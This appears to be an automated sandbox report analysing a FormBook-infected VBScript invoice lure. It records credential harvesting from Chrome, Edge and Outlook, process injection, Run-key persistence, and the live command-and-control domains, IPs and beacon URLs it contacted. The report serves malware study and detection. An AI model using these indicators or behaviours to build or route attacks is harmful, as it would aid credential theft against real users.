        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information221
        Scripting        		Valid Accounts1
        Windows Management Instrumentation        		221
        Scripting        		1
        Abuse Elevation Control Mechanism        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		1
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory14
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter        		1
        Registry Run Keys / Startup Folder        		411
        Process Injection        		3
        Obfuscated Files or Information        		Security Account Manager1
        Query Registry        		SMB/Windows Admin Shares1
        Email Collection        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook1
        Registry Run Keys / Startup Folder        		1
        Software Packing        		NTDS21
        Security Software Discovery        		Distributed Component Object ModelInput Capture5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading        		Cached Domain Credentials31
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
        Virtualization/Sandbox Evasion        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
        Process Injection        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Rundll32        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430770 Sample: 1000901 LIQUIDACION.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 53 www.webwheelsmedia.com 2->53 55 www.dhleba51.ru 2->55 57 3 other IPs or domains 2->57 71 Malicious sample detected (through community Yara rule) 2->71 73 Antivirus detection for URL or domain 2->73 75 Yara detected FormBook 2->75 77 3 other signatures 2->77 12 wscript.exe 1 2->12         started        15 wab.exe 1 2->15         started        17 wab.exe 3 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 93 VBScript performs obfuscated calls to suspicious functions 12->93 95 Suspicious powershell command line found 12->95 97 Wscript starts Powershell (via cmd or directly) 12->97 99 3 other signatures 12->99 21 powershell.exe 14 19 12->21         started        process6 dnsIp7 59 drive.google.com 142.250.101.100, 443, 49706, 49712 GOOGLEUS United States 21->59 61 drive.usercontent.google.com 142.251.2.132, 443, 49707, 49713 GOOGLEUS United States 21->61 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 25 powershell.exe 17 21->25         started        28 conhost.exe 21->28         started        30 cmd.exe 1 21->30         started        signatures8 process9 signatures10 85 Writes to foreign memory regions 25->85 87 Found suspicious powershell code related to unpacking or dynamic code loading 25->87 32 wab.exe 6 25->32         started        35 cmd.exe 1 25->35         started        37 wab.exe 25->37         started        39 wab.exe 25->39         started        process11 signatures12 67 Maps a DLL or memory area into another process 32->67 41 MSHXUddoGk.exe 32->41 injected process13 signatures14 89 Maps a DLL or memory area into another process 41->89 91 Found direct / indirect Syscall (likely to bypass EDR) 41->91 44 replace.exe 1 13 41->44         started        process15 signatures16 101 Tries to steal Mail credentials (via file / registry access) 44->101 103 Tries to harvest and steal browser information (history, passwords, etc) 44->103 105 Modifies the context of a thread in another process (thread injection) 44->105 107 2 other signatures 44->107 47 MSHXUddoGk.exe 44->47 injected 51 firefox.exe 44->51         started        process17 dnsIp18 63 webwheelsmedia.com 162.241.253.78, 49715, 80 UNIFIEDLAYER-AS-1US United States 47->63 65 www.dhleba51.ru 195.24.68.5, 49716, 49717, 49718 RU-CENTERRU Russian Federation 47->65 69 Found direct / indirect Syscall (likely to bypass EDR) 47->69 signatures19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        1000901 LIQUIDACION.vbs5%ReversingLabsWin32.Dropper.Generic

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        webwheelsmedia.com3%VirustotalBrowse
        www.dhleba51.ru2%VirustotalBrowse
        www.webwheelsmedia.com2%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://drive.googP0%Avira URL Cloudsafe
        http://www.webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY0%Avira URL Cloudsafe
        http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU0%Avira URL Cloudsafe
        http://www.dhleba51.ru/im2z/100%Avira URL Cloudmalware
        https://drive.usercontent.googh0%Avira URL Cloudsafe
        http://www.dhleba51.ru/im2z/0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        webwheelsmedia.com
        		162.241.253.78
        		truefalseunknown
        www.dhleba51.ru
        		195.24.68.5
        		truefalseunknown
        drive.google.com
        		142.250.101.100
        		truefalse
          		high
          drive.usercontent.google.com
          		142.251.2.132
          		truefalse
            		high
            www.webwheelsmedia.com
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dYfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.dhleba51.ru/im2z/false
            • 0%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.compowershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2177170811.000002B339C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  • URL Reputation: malware
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000002.00000002.2177170811.000002B33858E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://drive.googPpowershell.exe, 00000002.00000002.2177170811.000002B339BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://drive.google.compowershell.exe, 00000002.00000002.2177170811.000002B337E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339B94000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://drive.usercontent.googhpowershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://drive.usercontent.google.com/wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://drive.google.compowershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://apis.google.compowershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKUMSHXUddoGk.exe, 00000012.00000002.2596058187.0000000002C04000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        162.241.253.78
                                        		webwheelsmedia.comUnited States
                                        		46606UNIFIEDLAYER-AS-1USfalse
                                        195.24.68.5
                                        		www.dhleba51.ruRussian Federation
                                        		48287RU-CENTERRUfalse
                                        142.251.2.132
                                        		drive.usercontent.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        142.250.101.100
                                        		drive.google.comUnited States
                                        		15169GOOGLEUSfalse

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1430770
                                        Start date and time:2024-04-24 07:02:11 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 25s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:22
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:2
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:1000901 LIQUIDACION.vbs
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winVBS@23/8@4/4
                                        EGA Information:
                                        • Successful, ratio: 25%
                                        HCA Information:
                                        • Successful, ratio: 84%
                                        • Number of executed functions: 99
                                        • Number of non-executed functions: 260
                                        Cookbook Comments:
                                        • Found application associated with file extension: .vbs

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target MSHXUddoGk.exe, PID 1172 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7500 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        06:04:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run YDN4C C:\Program Files (x86)\windows mail\wab.exe
                                        06:04:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run YDN4C C:\Program Files (x86)\windows mail\wab.exe
                                        07:03:01API Interceptor7613x Sleep call for process: powershell.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        162.241.253.782x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                        • www.webwheelsmedia.com/9upe/
                                        195.24.68.5X6yu1q9YBY.exeGet hashmaliciousFormBookBrowse
                                        • www.tiflovector.ru/pz6u/?3I=0G6+4PQ3ff1VVX3bDFVBtpfcw4kWSisC64ofEkjldKjfJt8rvq/jRvoecRZPqzxQYgqqDTzjiov+pqR5Wm+QQGUA/Xhr4Yy7BQ==&mwwq=HfE7zZ
                                        RUS3109Y51.exeGet hashmaliciousAveMaria, FormBook, UACMeBrowse
                                        • www.tiflovector.ru/pz6u/?sfwB4SN2=0G6+4PQ3ff1VVX3bDFVBtpfcw4kWSisC64ofEkjldKjfJt8rvq/jRvoecRZPqzxQYgqqDTzjiov+pqR5Wm+QQGUA/Xhr4Yy7BQ==&PDi=elvCeXhuDD
                                        20221111_BESES220459 Pref. San Blas_Lastres LIDL Esc#U00fazar_pdf.vbsGet hashmaliciousFormBookBrowse
                                        • www.tiflovector.ru/egsw/?Cx5As3c=MsUxhK5SVMn6sbN5RQraZ50L2xVMhuBl1X79U/WDMQUEVM1waA1lys8+VJrWE4jc8VIhN7lo6yr3utkV+JXIHpwCKS96YU6/lA==&_T=uOhZKXe_VHo6
                                        50415 MAITE GISTAU-pdf.vbsGet hashmaliciousFormBookBrowse
                                        • www.tiflovector.ru/egsw/?Papk-b=MsUxhK5SVMn6sbN5RQraZ50L2xVMhuBl1X79U/WDMQUEVM1waA1lys8+VJrWE4jc8VIhN7lo6yr3utkV+JXIHpwCKS96YU6/lA==&TZZZw=5IMNFV
                                        Factura de venta 0A23000704_pdf.vbsGet hashmaliciousFormBookBrowse
                                        • www.tiflovector.ru/egsw/?YqZ=MsUxhK5SVMn6sbN5RQraZ50L2xVMhuBl1X79U/WDMQUEVM1waA1lys8+VJrWE4jc8VIhN7lo6yr3utkV+JXIHpwCKS96YU6/lA==&0cnW=SYiyFE4YJaw0
                                        JS410Y5107.exeGet hashmaliciousFormBookBrowse
                                        • www.tiflovector.ru/pz6u/?6OPy0h=0G6+4PQ3ff1VVX3bDFVBtpfcw4kWSisC64ofEkjldKjfJt8rvq/jRvoecRZPqzxQYgqqDTzjiov+pqR5Wm+VakUq7l4M56OSDA==&zJ=_jCwo
                                        JH02823E51.exeGet hashmaliciousFormBookBrowse
                                        • www.tiflovector.ru/pz6u/?u2h6Rpv6=0G6+4PQ3ff1VVX3bDFVBtpfcw4kWSisC64ofEkjldKjfJt8rvq/jRvoecRZPqzxQYgqqDTzjiov+pqR5Wm+VZmQmx3QM/qnLH9+nnEpxLDES&ce=QXlD
                                        AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.tiflovector.ru/gzrd/?JHPrc6=dLzz622iDnAM3YmBDXhZ2ePChMJj8gUbmyVJVTE89QYNicHBdjdQm3KGdJyl4vHtP8tGDdKFrKLd55X7Y2fD0hvhxcMOTTRhoA==&txRp=a6FnPKIJ0Rn-f

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        UNIFIEDLAYER-AS-1USFT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                        • 192.185.124.132
                                        CREDIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.129.60
                                        Total Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.129.60
                                        knfV5IVjEV.lnkGet hashmaliciousUnknownBrowse
                                        • 162.241.216.65
                                        http://www.noahsarkademy.comGet hashmaliciousUnknownBrowse
                                        • 69.49.230.31
                                        CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 192.185.13.234
                                        Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.144.15.164
                                        DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 192.185.13.234
